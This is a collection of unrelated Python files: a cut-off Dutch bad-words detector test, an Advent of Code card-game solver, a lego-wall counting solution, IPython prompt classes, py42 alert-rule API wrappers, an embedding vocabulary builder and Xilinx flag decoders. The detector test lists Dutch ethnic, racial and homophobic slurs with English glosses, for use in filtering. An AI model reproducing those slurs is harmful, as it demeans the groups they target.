    "kakhoofd", "kakken",  # kakhoofd = poopy head; kakken = to poop (verb)
    "kanker", "kenker",  # cancer
    "klootzak", "klootzakken",  # "ball sack"
    "klote",  # lit.: balls; equivalent: "sucky"
    "kolere", "klere",  # Cholera
    "kont", "kontgat",  # butt, butthole
    "kontje",  # little butt
    "lekkerding", "lekker ding",  # means something like "hot piece"
    "likken",  # lick (not totally sure why this is here)
    "pedo",  # add "pedofiel"; pedophile
    "penis", "penissen",  # penis, penises
    "peop",  # misspelling of poep (poop)
    "pijpen",  # to give a blowjob
    "pik",  # dick
    "pimel", "piemel", "piemels",  # colloquial for penis (Eng: dick)
    "pipi",  # somewhat archaic, somewhat childish word for penis
    "poep", "poepen", "poephoofd",  # poop / poopy head
    "poepie", "poepje", "poepjes", "poepsex",  # more poop words
    "poept", "poepte", "poepseks",  # more poop words
    "poepstamper", "poepstampen",  # pejorative for gay person
    "pokke", "pokken",  # Smallpox
    "porn", "porno",  # porn
    "neuk", "neuke", "neuken", "neukende", "neukt",  # "fuck" conjugations
    "neukte", "neukten", "geneukt",  # "fuck" conjugations continued
    "nicht", "nichten",  # "faggot" but also sometimes "cousin"
    "strond", "stront",  # shit
    "zuigt", "suckt",  # sucks
    "sukkel", "sukkels",  # sucker (idiot)
    "tering",  # colloquial word for tuberculosis, now a swear word;
    "tiet", "tetten", "tieten",  # tits
    "verekte", "verrekte",  # "damn" or "fucking" (adj)
    "verkracht", "verkrachten",  # rape/raped
    "dikzak",  # fat person
    "mogolen", "mogool", "mongool", "mongolen",  # perj. for down syndrome
    "mooiboy",  # man who puts a lot of effort into his appearance
    "sperma",  # sperm
    "kut", "kutje", "kutjes",  # vulgar word for vagina (Eng.: cunt)
    "stelletje",  # "bunch of", as part of a racial slur or perj.
    "lul",  # dick
    "lullen",  # out of an ass
    "lulltje",  # weak person
    "reet",  # buttcrack, often used in an idiom that means "don't give a shit"
    "slet",  # slut
    "scheet", "scheten",  # fart
    "schijt",  # shit
    "tyfus",  # Typhoid
    "smeerlap",  # literally: "grease rag"
    "het zuigt",  # "It sucks"
    "sul",  # "wimp", "dork", or "schlemiel". Its etymology is unclear.
    "vreten",  # rude form of the verb "to eat"
    "vuil", "vuile",  # "filth" or "filthy"
    "wijf", "kutwijf", "kankerhoer", "rothoer", "vishoer",  # perj for women

    # Racial slurs
    "bamivreter",  # "bami eater" an ethnic slur used against people of Asian
    "bosneger",  # literally: "bushnegro"
    "geitenneuker",  # literally: "goat fucker"
    "kakker",  # "crapper" -- higher social class idiot
    "koelie",  # "coolie" Indonesian laborer
    "lijp",  # slur for Jewish people and "slow", "dumb", "sluggish"
    "mocro",  # people of Moroccan descent
    "mof", "moffenhoer", "mofrica",  # ethnic slur used for german people
    "neger", "negers", "nikker",  # n-word
    "poepchinees",  # "poop Chinese"
    "roetmop",  # ethnic slur for black people.
    "spaghettivreter", "pastavreter",  # perj. for people of Italian descent
    "loempiavouwer",  # "spring roll folder" people of Vietnamese descent
    "spleetoog",  # "slit eye" term for people of Asian descent
    "tuig",  # "scum"
    "zandneger",  # "sand negro" an ethnic slur for people of Middle Eastern

    # Religion
    "gadverdamme", "godverdomme", "gadver", "getverderrie",  # "god damn"
    "getver", "verdomme", "verdamme", "verdorie",  # "god damn" continued
    "godskolere",  # "god fury"
    "graftak",  # "grave branch" an old, moody, cranky person.
    "jezus christus", "jezus", "tjezus", "jeetje", "jezus mina",  # Jesus
    "jesses", "jasses", "harrejasses", "here jezus",  # Jesus continued
]
# Informal / colloquial Dutch words (not profane; flag casual register).
INFORMAL = [
    "aap", "aapjes",
    "banaan",
    "bent",
    "boe", "boeit",
    "doei",  # fixed: missing comma previously fused this with "dombo"
    "dombo", "domme",
    "eigelijk",
    "godverdomme",
    "groetjes",
    "gwn",
    "hoi",
    "hallo", "halloo",
    "heb",
    "heej", "heey", "heeel",
    "hou", "houd",
    "hoihoi", "hoii", "hoiii",
    "hoor",
    "izan",
    "jij",
    "jou",
    "jullie",
    "kaas",
    "klopt",
    "kots",
    "kusjes",
    "lekker", "lekkere", "lkkr",
    "maarja",
    "mama",
    "nou",
    "oma",
    "ofzo",
    "oke",
    "snap",
    "stinken", "stinkt",
    "stoer",
    "swek",
    "vies", "vieze",
    "vind",
    "vuile",
    "zielig",
    "zooi",
    "zeg",
]
OTHER = [
"""
De stemtoonhoogte is de toonhoogte van de kamertoon. Door middel van een
stemvork is deze kamertoon beschikbaar voor het stemmen van een
muziekinstrument.
Internationaal is deze toonhoogte in het midden van de 20e eeuw vastgesteld
op een frequentie van 440 Hz. De stemtoon lag echter niet altijd vast. Soms
leest men ergens dat de stemtoon door de eeuwen heen steeds hoger is komen
te liggen, maar dat is slechts de helft van het verhaal. Er waren orgels
die een hogere stemtoon hadden, en later lager gestemd werden. Kerkorgels
verschilden enorm van stemtoon. In de loop van de tijd is die variatie
steeds kleiner geworden. Naarmate mensen steeds mobieler werden, ontstond
ook de behoefte aan meer compatibiliteit van instrumenten.
"""
]
def test_badwords():
    """Badwords matcher catches BAD, ignores OTHER, and survives pickling."""
    compare_extraction(dutch.badwords.revision.datasources.matches, BAD, OTHER)
    round_tripped = pickle.loads(pickle.dumps(dutch.badwords))
    assert round_tripped == dutch.badwords
def test_informals():
    """Informals matcher catches INFORMAL, ignores OTHER, survives pickling."""
    compare_extraction(dutch.informals.revision.datasources.matches,
                       INFORMAL, OTHER)
    round_tripped = pickle.loads(pickle.dumps(dutch.informals))
    assert round_tripped == dutch.informals
def test_dictionary():
    """Dictionary datasource splits known words from misspellings."""
    cache = {revision_oriented.revision.text: 'Door middel van een worngly.'}
    known = solve(dutch.dictionary.revision.datasources.dict_words, cache=cache)
    assert known == ["Door", "middel", "van", "een"]
    unknown = solve(dutch.dictionary.revision.datasources.non_dict_words,
                    cache=cache)
    assert unknown == ["worngly"]
    assert dutch.dictionary == pickle.loads(pickle.dumps(dutch.dictionary))
def test_stopwords():
    """Stopwords datasource separates stopwords from content words."""
    cache = {revision_oriented.revision.text: 'Door middel van een!'}
    stops = solve(dutch.stopwords.revision.datasources.stopwords, cache=cache)
    assert stops == ["Door", "van", "een"]
    content_words = solve(dutch.stopwords.revision.datasources.non_stopwords,
                          cache=cache)
    assert content_words == ["middel"]
    assert dutch.stopwords == pickle.loads(pickle.dumps(dutch.stopwords))
def test_stemmed():
    """Stemmer lowercases and stems the revision text, and survives pickling."""
    cache = {revision_oriented.revision.text: 'Door middel van een!'}
    stems = solve(dutch.stemmed.revision.datasources.stems, cache=cache)
    assert stems == ["dor", "middel", "van", "een"]
    assert dutch.stemmed == pickle.loads(pickle.dumps(dutch.stemmed))
|
# ======================================================================
# Crab Combat
# Advent of Code 2020 Day 22 -- Eric Wastl -- https://adventofcode.com
#
# Python implementation by Dr. Dean Earl Wright III
# ======================================================================
# ======================================================================
# g a m e . p y
# ======================================================================
"A solver for the Advent of Code 2020 Day 22 puzzle"
# ----------------------------------------------------------------------
# import
# ----------------------------------------------------------------------
import player
# ----------------------------------------------------------------------
# constants
# ----------------------------------------------------------------------
# ======================================================================
# Game
# ======================================================================
class Game(object):   # pylint: disable=R0902, R0205
    """A game of Crab Combat (AoC 2020 day 22, parts 1 and 2).

    Fixes: removed a stray debug print in round_two(); part_two() now
    honors its previously-ignored `verbose` flag before printing the
    round count.
    """

    def __init__(self, text=None, part2=False):
        "Initialize the game, optionally dealing players from the input text"
        # 1. Set the initial values
        self.part2 = part2
        self.text = text
        self.players = []
        self.previous = set()   # game states seen so far (part 2 loop guard)
        self.winner = None      # index (0 or 1) of the winning player
        self.rounds = 0
        # 2. Process text (if any)
        if text is not None and len(text) > 0:
            self._process_text(text)

    def _process_text(self, text):
        "Read the input text and create the players"
        # 1. We don't have a player yet
        plyr = None
        # 2. Loop for all of the lines of the text
        for line in text:
            # 3. "Player N:" lines start a new player
            if line.startswith('Player'):
                plyr = player.Player(part2=self.part2,
                                     number=int(line[:-1].split()[1]))
                self.players.append(plyr)
            # 4. Any other line is a card for the current player
            else:
                plyr.add_card(int(line))

    def who_is_the_winner(self):
        "Returns the winning player's index (0 or 1) or None if there is none"
        if self.winner is None:
            if self.players[0].lost():
                self.winner = 1
            elif self.players[1].lost():
                self.winner = 0
        return self.winner

    def round_one(self):
        "Play a round with the part 1 rules: higher card keeps both"
        # 1. Get cards from both players
        card0 = self.players[0].get_top_card()
        card1 = self.players[1].get_top_card()
        # 2. Determine the winner who gets to keep both cards
        if card0 > card1:
            self.players[0].keep(card0, card1)
        else:
            self.players[1].keep(card1, card0)
        # 3. Update the number of rounds
        self.rounds += 1

    def get_game_hash(self):
        "Returns a state key for this game: both decks joined by a 0 sentinel"
        # 1. Get all of the cards
        cards = []
        cards.extend(self.players[0].cards)
        cards.append(0)
        cards.extend(self.players[1].cards)
        # 2. And return the string representation of that as the hash
        return str(cards)

    def round_two(self, limit=0):
        "Play a round with the part 2 (Recursive Combat) rules"
        # 1. Infinite game prevention: a repeated state means player 1 wins
        game_hash = self.get_game_hash()
        if game_hash in self.previous:
            self.winner = 0
            self.rounds += 1
            return
        self.previous.add(game_hash)
        # 2. Get cards from both players
        card0 = self.players[0].get_top_card()
        card1 = self.players[1].get_top_card()
        # 3. Recurse only when both players hold at least as many cards
        #    as the value they just drew
        if card0 > len(self.players[0].cards) or card1 > len(self.players[1].cards):
            # 4. Too few cards to recurse: higher card wins, as in part 1
            if card0 > card1:
                self.players[0].keep(card0, card1)
            else:
                self.players[1].keep(card1, card0)
            self.rounds += 1
        else:
            # 5. Decide the round by playing a sub-game with copied decks
            new_game = self.clone([card0, card1])
            winner = new_game.play(limit=limit)
            self.rounds += new_game.rounds
            # 6. Give both cards to the round winner
            if winner is not None:
                if winner == 0:
                    self.players[0].keep(card0, card1)
                else:
                    self.players[1].keep(card1, card0)

    def play(self, limit=0):
        "Play rounds until there is a winner; returns winner index or None"
        # 1. Keep track of the number of rounds
        max_rounds = limit
        if max_rounds == 0:
            max_rounds = 9999999
        # 2. Loop until there is a winner
        while self.who_is_the_winner() is None and self.rounds < max_rounds:
            # 3. Play a round under the appropriate rules
            if self.part2:
                self.round_two(limit=max_rounds - self.rounds)
            else:
                self.round_one()
        # 4. Return the winning player (None if the round limit was hit)
        if self.rounds >= max_rounds:
            return None
        return self.who_is_the_winner()

    def clone(self, cards):
        "Create a copy of the current game for recursion"
        # 1. Create a new empty game
        other = Game(part2=self.part2)
        # 2. Add the players; each clones the top `card` cards of its deck
        #    (assumes Player.clone(n) copies the top n cards, per AoC rules)
        for card, plyr in zip(cards, self.players):
            other.players.append(plyr.clone(card))
        # 3. Return a new game that is ready for recursion
        return other

    def part_one(self, verbose=False, limit=0):
        "Returns the solution for part one (the winning player's score)"
        assert verbose in [True, False]
        assert limit >= 0
        # NOTE(review): limit is accepted but not forwarded to play() here --
        # confirm that is intended.
        # 1. Play the game until there is a winner
        winner = self.play()
        if winner is None:
            return None
        # 2. Return the winner's deck score
        return self.players[winner].score()

    def part_two(self, verbose=False, limit=0):
        "Returns the solution for part two (the winning player's score)"
        assert verbose in [True, False]
        assert limit >= 0
        # 1. Play the game until there is a winner
        winner = self.play(limit=limit)
        if winner is None:
            return None
        # 2. Report progress only when asked (the old code always printed)
        if verbose:
            print("Played %d rounds" % self.rounds)
        return self.players[winner].score()
# ----------------------------------------------------------------------
# module initialization
# ----------------------------------------------------------------------
# This module is a library; nothing to do when run directly.
if __name__ == '__main__':
    pass
# ======================================================================
# end g a m e . p y end
# ======================================================================
|
# -*- coding: utf-8 -*-
"""
Problem Statement
You have 4 types of lego blocks, of sizes (1 x 1 x 1), (1 x 1 x 2), (1 x 1 x 3), and (1 x 1 x 4). Assume that you have
an infinite number of blocks of each type.
Using these blocks, you want to make a wall of height N and width M. The wall should not have any holes in it. The wall
you build should be one solid structure. A solid structure can be interpreted in one of the following ways:
(1)It should not be possible to separate the wall along any vertical line without cutting any lego block used to build
the wall.
(2)You cannot make a vertical cut from top to bottom without cutting one or more lego blocks.
The blocks can only be placed horizontally. In how many ways can the wall be built?
"""
__author__ = 'Danyang'
MOD = 1000000007


class Solution(object):
    """Counts solid lego walls of height N and width M (answer mod 1e9+7).

    Fixed: replaced Python-2-only ``xrange``/lazy ``map`` with ``range`` and
    a list comprehension (works identically on Python 2), and removed a dead
    ``break`` (f_N[j] is never 0 mod the prime for j >= 1).
    """

    def __init__(self):
        # Available block widths (all blocks are 1 unit high and deep).
        self.lens = [1, 2, 3, 4]

    def solve(self, cipher):
        """Return the number of solid N x M walls.

        f[j]  : ways to tile one row of width j (not necessarily solid)
        f_N[j]: ways to build an N-row wall of width j, splittable or not
                (= f[j] ** N, computed with 3-arg pow for speed)
        s[j]  : solid walls of width j, via inclusion-exclusion over the
                leftmost vertical split: s[j] = f_N[j] - sum f_N[j-k]*s[k]

        :param cipher: (N, M) height and width
        :return: count of solid walls, mod 1e9+7
        """
        N, M = cipher
        f = [0] * (M + 1)
        f[0] = 1
        for j in range(1, M + 1):
            for l in self.lens:
                if j - l >= 0:
                    f[j] += f[j - l]
            f[j] %= MOD
        f_N = [pow(x, N, MOD) for x in f]
        s = [0] * (M + 1)
        for j in range(1, M + 1):
            s[j] = f_N[j]
            for k in range(1, j):
                s[j] -= f_N[j - k] * s[k]
            s[j] %= MOD
        return s[M]
class Solution_TLE(object):
    """Earlier, slower variants kept for reference.

    Fixed for Python 2/3 compatibility: ``xrange`` -> ``range`` and the
    integer division in solve_error uses ``//`` (matching the original
    Python 2 semantics of ``/`` on ints).
    """

    def __init__(self):
        # Available block widths (all blocks are 1 unit high and deep).
        self.lens = [1, 2, 3, 4]

    def solve(self, cipher):
        """O(N*M^2) version: full 2-D tables (correct but too slow).

        f[i][j]: walls of size i x j, not necessarily solid (= f[1][j]**i)
        s[i][j]: solid walls of size i x j, via
                 s[h][w] = f(h,w) - sum(f[h][w-i]*s[h][i])

        :param cipher: (N, M) height and width
        :return: count of solid walls, mod 1e9+7
        """
        N, M = cipher
        f = [[0 for _ in range(M + 1)] for _ in range(N + 1)]
        s = [[0 for _ in range(M + 1)] for _ in range(N + 1)]
        f[1][0] = 1
        for j in range(1, M + 1):
            for l in self.lens:
                if j - l >= 0:
                    f[1][j] += f[1][j - l]
                    f[1][j] %= MOD
        for i in range(2, N + 1):
            for j in range(1, M + 1):
                f[i][j] = f[i - 1][j] * f[1][j]
                f[i][j] %= MOD
        for i in range(1, N + 1):
            for j in range(1, M + 1):
                s[i][j] = f[i][j]
                if s[i][j] <= 0: break
                for k in range(1, j):  # inclusion-exclusion over splits
                    s[i][j] -= f[i][j - k] * s[i][k]
                    s[i][j] %= MOD
        return s[N][M]

    def solve_error(self, cipher):
        """Known-incorrect attempt, kept for the record.

        f[i][j] was meant to satisfy
        f[i][j+1] = iC1*f[i-1][j]*f[1][j+1] = iC2*f[i-2][j]*f[1][j+1]^2 ...
        (the equivalence was never proved, and the recurrence is wrong).

        :param cipher: the cipher
        """
        N, M = cipher
        f = [[0 for _ in range(M + 1)] for _ in range(N + 1)]
        f[1][1] = 1
        for j in range(1, M + 1):
            for l in self.lens:
                if j - l >= 1:
                    f[1][j] += f[1][j - l]
        for j in range(1, M + 1):
            f[1][j] -= f[1][j - 1]
        for i in range(2, N + 1):
            for j in range(1, M + 1):
                cmb = i
                for l in range(1, i + 1):
                    f[i][j] += cmb * f[i - l][j - 1] * (f[1][j] ** i)  # equivalent
                    cmb = cmb * (i - l) // (l + 1)
        return f[N][M]
if __name__ == "__main__":
    import sys
    # Read the test count then one "N M" pair per case from 0.in.
    # Fixed: "print s," was Python-2-only syntax; sys.stdout.write() behaves
    # the same on both versions. The file is now closed via `with`.
    solution = Solution()
    with open("0.in", "r") as f:
        # f = sys.stdin
        testcases = int(f.readline().strip())
        for t in range(testcases):
            # construct cipher
            cipher = [int(tok) for tok in f.readline().strip().split(' ')]
            # solve
            sys.stdout.write("%s\n" % (solution.solve(cipher)))
|
import datetime
from server.ShiftManagerService import db
import json
''''
STILL NOT IN USE
'''
class shift:
    """Wrapper around a shift record loaded from the database.

    (Module marker says this is still not in use.)
    """

    def __init__(self, company_id, shift_id):
        # Copy every stored field of the shift onto this instance, if found.
        shift_from_db = db.get_shift(company_id, shift_id)
        if shift_from_db is not None:
            self.__dict__.update(shift_from_db)

    def __delete_field(self, data, field):
        '''
        Safely delete a field from a dict (no-op when the key is absent).
        '''
        # Fixed: the old truthiness check (`if data.get(field):`) skipped
        # keys holding falsy values (0, "", [], None). pop() removes the
        # key whenever it exists, regardless of its value.
        data.pop(field, None)
|
# ! Testes de concatenação com atribuição de valores
#n1 = int(input('Digite o primeiro numero \n'))
#n2 = int(input('Digite o segundo numero \n'))
#n3 = n1 + n2
#print('A soma dos numeros é ', n1 + n2)
#print('A soma entre ', n1, ' e ', n2, 'é ', n3)
#print('A soma dos numeros é {}'.format(n3))
#print('A soma entre {} e {} é {}'.format(n1,n2,n3))
#OU
#print('A soma entre {0} e {1} é {2}'.format(n1,n2,n3))
#n = input('Digite um valor \n')
#print(n.isnumeric())
# isnumeric para numeros ou isalpha para alfabetico
|
"""Terminal input and output prompts."""
from __future__ import print_function
from pygments.token import Token
import sys
from IPython.core.displayhook import DisplayHook
from prompt_toolkit.layout.utils import token_list_width
class Prompts(object):
    """Token-based prompt definitions for the IPython terminal frontend."""

    def __init__(self, shell):
        self.shell = shell

    def in_prompt_tokens(self, cli=None):
        count = str(self.shell.execution_count)
        return [
            (Token.Prompt, 'In ['),
            (Token.PromptNum, count),
            (Token.Prompt, ']: '),
        ]

    def _width(self):
        # Display width (in terminal cells) of the input prompt.
        return token_list_width(self.in_prompt_tokens())

    def continuation_prompt_tokens(self, cli=None, width=None):
        width = self._width() if width is None else width
        padding = ' ' * (width - 5)
        return [(Token.Prompt, padding + '...: ')]

    def rewrite_prompt_tokens(self):
        dashes = '-' * (self._width() - 2)
        return [(Token.Prompt, dashes + '> ')]

    def out_prompt_tokens(self):
        count = str(self.shell.execution_count)
        return [
            (Token.OutPrompt, 'Out['),
            (Token.OutPromptNum, count),
            (Token.OutPrompt, ']: '),
        ]
class ClassicPrompts(Prompts):
    """Plain ``>>>`` / ``...`` prompts mimicking the vanilla Python REPL."""

    def in_prompt_tokens(self, cli=None):
        return [(Token.Prompt, '>>> ')]

    def continuation_prompt_tokens(self, cli=None, width=None):
        return [(Token.Prompt, '... ')]

    def rewrite_prompt_tokens(self):
        # Classic mode shows no rewrite prompt.
        return []

    def out_prompt_tokens(self):
        # Classic mode prints output without an Out[...] prefix.
        return []
class RichPromptDisplayHook(DisplayHook):
    """Subclass of base display hook using coloured prompt"""
    def write_output_prompt(self):
        # Emit the output separator, then the Out[...] prompt -- coloured via
        # prompt_toolkit when a CLI is attached, plain text otherwise.
        sys.stdout.write(self.shell.separate_out)
        # If we're not displaying a prompt, it effectively ends with a newline,
        # because the output will be left-aligned.
        self.prompt_end_newline = True
        if self.do_full_cache:
            tokens = self.shell.prompts.out_prompt_tokens()
            prompt_txt = ''.join(s for t, s in tokens)
            if prompt_txt and not prompt_txt.endswith('\n'):
                # Ask for a newline before multiline output
                self.prompt_end_newline = False
            if self.shell.pt_cli:
                self.shell.pt_cli.print_tokens(tokens)
            else:
                sys.stdout.write(prompt_txt)
|
from py42.services import BaseService
class AlertRulesService(BaseService):
    """A service to manage Alert Rules."""

    _version = u"v1"
    _resource = u"Rules/"
    _api_prefix = u"/svc/api/{}/{}".format(_version, _resource)

    def __init__(self, connection, user_context, user_profile_service):
        super(AlertRulesService, self).__init__(connection)
        self._user_context = user_context
        self._user_profile_service = user_profile_service
        # Per-rule-type sub-services, created lazily on first property access.
        self._exfiltration = None
        self._cloud_share = None
        self._file_type_mismatch = None

    @property
    def exfiltration(self):
        """Sub-service for endpoint-exfiltration rules (lazily constructed)."""
        if not self._exfiltration:
            tenant = self._user_context.get_current_tenant_id()
            self._exfiltration = ExfiltrationService(self._connection, tenant)
        return self._exfiltration

    @property
    def cloudshare(self):
        """Sub-service for cloud-share-permission rules (lazily constructed)."""
        if not self._cloud_share:
            tenant = self._user_context.get_current_tenant_id()
            self._cloud_share = CloudShareService(self._connection, tenant)
        return self._cloud_share

    @property
    def filetypemismatch(self):
        """Sub-service for file-type-mismatch rules (lazily constructed)."""
        if not self._file_type_mismatch:
            tenant = self._user_context.get_current_tenant_id()
            self._file_type_mismatch = FileTypeMismatchService(
                self._connection, tenant
            )
        return self._file_type_mismatch

    def add_user(self, rule_id, user_id):
        """Attach a user (with their cloud aliases) to the given alert rule."""
        tenant = self._user_context.get_current_tenant_id()
        profile = self._user_profile_service.get_by_id(user_id)
        aliases = profile.data.get(u"cloudUsernames") or []
        payload = {
            u"tenantId": tenant,
            u"ruleId": rule_id,
            u"userList": [
                {u"userIdFromAuthority": user_id, u"userAliasList": aliases}
            ],
        }
        return self._connection.post(
            u"{}{}".format(self._api_prefix, u"add-users"), json=payload
        )

    def remove_user(self, rule_id, user_id):
        """Detach a single user from the given alert rule."""
        payload = {
            u"tenantId": self._user_context.get_current_tenant_id(),
            u"ruleId": rule_id,
            u"userIdList": [user_id],
        }
        return self._connection.post(
            u"{}{}".format(self._api_prefix, u"remove-users"), json=payload
        )

    def remove_all_users(self, rule_id):
        """Detach every user from the given alert rule."""
        payload = {
            u"tenantId": self._user_context.get_current_tenant_id(),
            u"ruleId": rule_id,
        }
        return self._connection.post(
            u"{}{}".format(self._api_prefix, u"remove-all-users"), json=payload
        )
class CloudShareService(BaseService):
    """Queries cloud-share-permission alert rules for one tenant."""

    _version = u"v1"
    _resource = u"query-cloud-share-permissions-rule"
    _api_prefix = u"/svc/api/{}/Rules/{}".format(_version, _resource)

    def __init__(self, connection, tenant_id):
        super(CloudShareService, self).__init__(connection)
        self._tenant_id = tenant_id

    def get(self, rule_id):
        """Fetch cloud share alert rule by rule id.

        Args:
            rule_id (str): Observer rule Id of a rule to be fetched.

        Returns
            :class:`py42.response.Py42Response`
        """
        payload = {u"tenantId": self._tenant_id, u"ruleIds": [rule_id]}
        return self._connection.post(self._api_prefix, json=payload)
class ExfiltrationService(BaseService):
    """Queries endpoint-exfiltration alert rules for one tenant."""

    _version = u"v1"
    _resource = u"query-endpoint-exfiltration-rule"
    _api_prefix = u"/svc/api/{}/Rules/{}".format(_version, _resource)

    def __init__(self, connection, tenant_id):
        super(ExfiltrationService, self).__init__(connection)
        self._tenant_id = tenant_id

    def get(self, rule_id):
        """Fetch exfiltration alert rule by rule id.

        Args:
            rule_id (str): Observer rule Id of a rule to be fetched.

        Returns
            :class:`py42.response.Py42Response`
        """
        payload = {u"tenantId": self._tenant_id, u"ruleIds": [rule_id]}
        return self._connection.post(self._api_prefix, json=payload)
class FileTypeMismatchService(BaseService):
    """Queries file-type-mismatch alert rules for one tenant."""

    _version = u"v1"
    _resource = u"query-file-type-mismatch-rule"
    _api_prefix = u"/svc/api/{}/Rules/{}".format(_version, _resource)

    def __init__(self, connection, tenant_id):
        super(FileTypeMismatchService, self).__init__(connection)
        self._tenant_id = tenant_id

    def get(self, rule_id):
        """Fetch File type mismatch alert rules by rule id.

        Args:
            rule_id (str): Observer rule Id of a rule to be fetched.

        Returns
            :class:`py42.response.Py42Response`
        """
        payload = {u"tenantId": self._tenant_id, u"ruleIds": [rule_id]}
        return self._connection.post(self._api_prefix, json=payload)
|
import json
from config.config import data_path_config
import numpy as np
from collections import defaultdict
import pickle
import datetime
def build_vocab_emb(data_path):
    """Load word vectors from a text file and build the vocab + embedding matrix.

    The file holds one "word v1 v2 ..." entry per line, space-separated.
    Index 0 is reserved for the '<UNK>' (out-of-vocabulary) token.

    Fixed: removed an unused counter variable, streamed the file instead of
    materializing readlines(), and stopped shadowing the `file` builtin.

    :param data_path: path to the embedding text file
    :return: (embedding_weight, api2id, id2api) -- the (vocab_size, dim)
        float32 matrix, the word->index dict, and its inverse.
    """
    UNK = 0
    vec_tabs = {}
    vec_size = 0
    with open(data_path, 'r', encoding='UTF-8') as fh:
        for line in fh:
            tokens = line.strip().split(" ")
            vec = tokens[1:]
            vec_size = len(vec)
            vec_tabs[tokens[0]] = np.asarray(vec, dtype=np.float32)
    api2id = {word: idx + 1 for idx, word in enumerate(vec_tabs.keys())}
    api2id['<UNK>'] = UNK
    id2api = {idx: word for word, idx in api2id.items()}
    vocab_size = len(api2id)
    embedding_weight = np.zeros((vocab_size, vec_size), dtype=np.float32)
    for word, idx in api2id.items():
        if idx != UNK:
            embedding_weight[idx] = vec_tabs[word]
    # Give the OOV token a synthetic vector derived from the known embeddings
    # (mean over words, scaled by the overall std).
    embedding_weight[UNK] = np.mean(embedding_weight, 0) / np.std(embedding_weight)
    return embedding_weight, api2id, id2api
def build_train_data(data_path, vocab):
    """Index raw API-call sequences and pickle them grouped by (token id, position).

    Reads the raw sequence file named by the JSON config at ``data_path``,
    maps each token through ``vocab`` (missing tokens -> UNK id 0), then
    groups every sequence shorter than 50 tokens under each
    (token_id, position) pair it contains, pickling the result to
    "API/train_data".

    Fixed: removed a no-op ``datetime.datetime.now()`` call and a stray
    ``print(111)`` debug line; dropped a dead isinstance branch
    (str.split always returns a list); grouping now iterates sequences
    directly, which is O(total tokens) instead of O(vocab x sequences)
    and yields the same lists (dict insertion order may differ).
    """
    opt = data_path_config(data_path)
    raw_data_path = opt["data"]["raw_seq_data"]
    UNK = 0
    seq2id = []
    with open(raw_data_path, "r", encoding="utf-8") as fh:
        for inst in fh:
            seq = inst.strip().split(" ")
            seq2id.append([vocab.get(api, UNK) for api in seq])
    train_data = defaultdict(list)
    for oneseq in seq2id:
        if len(oneseq) >= 50:
            continue
        for i, token_id in enumerate(oneseq):
            train_data[(token_id, i)].append(oneseq)
    with open("API/train_data", "wb") as out:
        pickle.dump(train_data, out)
if __name__ == "__main__":
    # Build vocab/embeddings from the pretrained API vectors, then group the
    # raw sequences into pickled training data using that vocab.
    data_path = "API/embedding_api_256dd.txt"
    embedding_weight,vocab,Rvocab = build_vocab_emb(data_path)
    data_path1= "../config/api_data_path.json"
    build_train_data(data_path1,vocab)
|
# /*
# * Copyright (c) 2019,2020,2021 Xilinx Inc. All rights reserved.
# *
# * Author:
# * Ben Levinsky <ben.levinsky@xilinx.com>
# * Izhar Shaikh <izhar.ameer.shaikh@xilinx.com>
# *
# * SPDX-License-Identifier: BSD-3-Clause
# */
from enum import IntEnum
class REQ_USAGE(IntEnum):
    REQ_NO_RESTRICTION = 0
    REQ_SHARED = 1
    REQ_NONSHARED = 2
    REQ_TIME_SHARED = 3


# if this bit combination is on for usage offset, the meaning is as described below
req_usage_message = "Device usage policies"

req_usage = {
    REQ_USAGE.REQ_NO_RESTRICTION:
    "device accessible from all subsystem",
    REQ_USAGE.REQ_SHARED:
    "device simultaneously shared between two or more subsystems",
    REQ_USAGE.REQ_NONSHARED:
    "device exclusively reserved by one subsystem, always",
    REQ_USAGE.REQ_TIME_SHARED:
    "device is time shared between two or more subsystems",
}

# usage policy lives in bits [1:0] of the flag word
usage_mask = 0x3


def usage(flags):
    """Return a human-readable '# usage: ...' line for a requirement flag word."""
    return "# usage: " + req_usage[flags & usage_mask]
class REGION_SECURITY(IntEnum):
    ACCESS_FROM_SECURE = 0
    ACCESS_FROM_NONSECURE = 1


req_security_message = "Device/Memory region security status requirement per TrustZone."

req_security = {
    REGION_SECURITY.ACCESS_FROM_SECURE:
    "Device/Memory region only allows access from secure masters",
    REGION_SECURITY.ACCESS_FROM_NONSECURE:
    "Device/Memory region allow both secure or non-secure masters",
}

# TrustZone security policy lives in bit 2 of the flag word
security_mask = 0x4
security_offset = 0x2


def security(flags):
    """Return a human-readable '# security: ...' line for a requirement flag word."""
    return "# security: " + req_security[(flags & security_mask) >> security_offset]
class RDWR_POLICY(IntEnum):
    ALLOWED = 0
    NOT_ALLOWED = 1


# this map is only applicable for memory regions
req_rd_wr_message = "Read/Write access control policy"
req_rd_wr = {
    RDWR_POLICY.ALLOWED: "Transaction allowed",
    RDWR_POLICY.NOT_ALLOWED: "Transaction not Allowed",
}

# read policy is bit 3 of the flag word, write policy is bit 4
rd_policy_mask = 0x8
rd_policy_offset = 0x3
wr_policy_mask = 0x10
wr_policy_offset = 0x4
rw_message = "Read/Write access control policy."


def read_policy(flags):
    """Return a '# read policy: ...' line for a requirement flag word."""
    return "# read policy: " + req_rd_wr[(flags & rd_policy_mask) >> rd_policy_offset]


def write_policy(flags):
    """Return a '# write policy: ...' line for a requirement flag word."""
    return "# write policy: " + req_rd_wr[(flags & wr_policy_mask) >> wr_policy_offset]
# non-secure region check policy lives in bit 5 of the flag word
nsregn_check_mask = 0x20
nsregn_check_offset = 0x5


class NSREGN_POLICY(IntEnum):
    RELAXED = 0
    STRICT = 1


nsregn_message = "Non-secure memory region check type policy."
nsregn = {
    NSREGN_POLICY.RELAXED: "RELAXED",
    NSREGN_POLICY.STRICT: "STRICT",
}


def nsregn_policy(flags):
    """Return the non-secure region check policy line for a flag word."""
    policy = nsregn[(flags & nsregn_check_mask) >> nsregn_check_offset]
    return "# Non-secure memory region check type policy: " + policy
# capability bits live in bits [14:8] of the flag word
capability_offset = 0x8
capability_mask = 0x7F00
cap_message = "capability: "


def capability_policy(flags):
    """Return the capability field of a flag word as '# Capability policy: 0x..'."""
    return "# Capability policy: " + hex((flags & capability_mask) >> capability_offset)
# preallocation requirement lives in bit 6 of the flag word
prealloc_offset = 6
prealloc_mask = (0x1 << 6)


class PREALLOC(IntEnum):
    NOT_REQUIRED = 0
    REQUIRED = 1


prealloc = {
    PREALLOC.NOT_REQUIRED: "prealloc not required",
    PREALLOC.REQUIRED: "prealloc required",
}
prealloc_message = "prealloc policy "


def prealloc_policy(flags):
    """Return the '# Preallocation policy: ...' line for a flag word."""
    return "# Preallocation policy: " + prealloc[(flags & prealloc_mask) >> prealloc_offset]


